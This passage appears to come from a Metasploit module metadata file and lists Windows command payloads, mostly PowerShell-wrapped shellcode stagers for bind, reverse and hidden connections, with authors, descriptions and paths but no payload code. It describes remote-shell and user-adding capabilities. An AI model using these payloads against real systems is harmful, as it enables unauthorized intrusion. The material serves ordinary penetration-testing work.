- "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "cmd/windows/jjs_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/windows/powershell/adduser": { - "name": "Powershell Exec", - "fullname": "payload/cmd/windows/powershell/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "hdm ", - "Chris John Riley", - "vlad902 ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/adduser", - "staged": false - }, - "payload_cmd/windows/powershell/custom/bind_hidden_ipknock_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Hidden Bind Ipknock TCP Stager", - "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_hidden_ipknock_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_cmd/windows/powershell/custom/bind_hidden_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager", - "fullname": "payload/cmd/windows/powershell/custom/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_hidden_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_cmd/windows/powershell/custom/bind_ipv6_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_cmd/windows/powershell/custom/bind_ipv6_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/powershell/custom/bind_named_pipe": { - "name": "Powershell Exec, Windows shellcode stage, Windows x86 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/powershell/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "UserExistsError" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_cmd/windows/powershell/custom/bind_nonx_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/custom/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_nonx_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_cmd/windows/powershell/custom/bind_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (Windows x86)", - "fullname": "payload/cmd/windows/powershell/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp" - }, - "payload_cmd/windows/powershell/custom/bind_tcp_rc4": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_cmd/windows/powershell/custom/bind_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/cmd/windows/powershell/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_cmd/windows/powershell/custom/find_tag": { - "name": "Powershell Exec, Windows shellcode stage, Find Tag Ordinal Stager", - "fullname": "payload/cmd/windows/powershell/custom/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "skape " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nUse an established connection", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/find_tag", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/findtag_ord" - }, - "payload_cmd/windows/powershell/custom/reverse_http": { - "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_http", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_http" - }, - "payload_cmd/windows/powershell/custom/reverse_http_proxy_pstore": { - "name": "Powershell Exec, Windows shellcode stage, Reverse HTTP Stager Proxy", - "fullname": "payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_http_proxy_pstore", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_cmd/windows/powershell/custom/reverse_https": { - "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_https", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_https" - }, - "payload_cmd/windows/powershell/custom/reverse_ipv6_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_cmd/windows/powershell/custom/reverse_named_pipe": { - "name": "Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/powershell/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_cmd/windows/powershell/custom/reverse_nonx_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "vlad902 " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (No NX)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_nonx_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_cmd/windows/powershell/custom/reverse_ord_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "spoonm " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_ord_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp_allports": { - "name": "Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp_allports", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp_dns": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp_dns", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp_rc4": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp_rc4_dns": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "RageLtMan" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp_rc4_dns", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_cmd/windows/powershell/custom/reverse_tcp_uuid": { - "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "OJ Reeves" - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_cmd/windows/powershell/custom/reverse_udp": { - "name": "Powershell Exec, Windows shellcode stage, Reverse UDP Stager with UUID Support", - "fullname": "payload/cmd/windows/powershell/custom/reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "RageLtMan " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_udp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/powershell", - "adapted_refname": "windows/custom/reverse_udp", - "staged": true, - "stage_refname": "windows/custom", - "stager_refname": "windows/reverse_udp" - }, - "payload_cmd/windows/powershell/custom/reverse_winhttp": { - "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "bwatters-r7", - "hdm ", - "Borja Merino " - ], - "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-05-27 16:41:25 +0000", - "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", - "is_install_path": true, - "ref_name": "cmd/windows/powershell/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 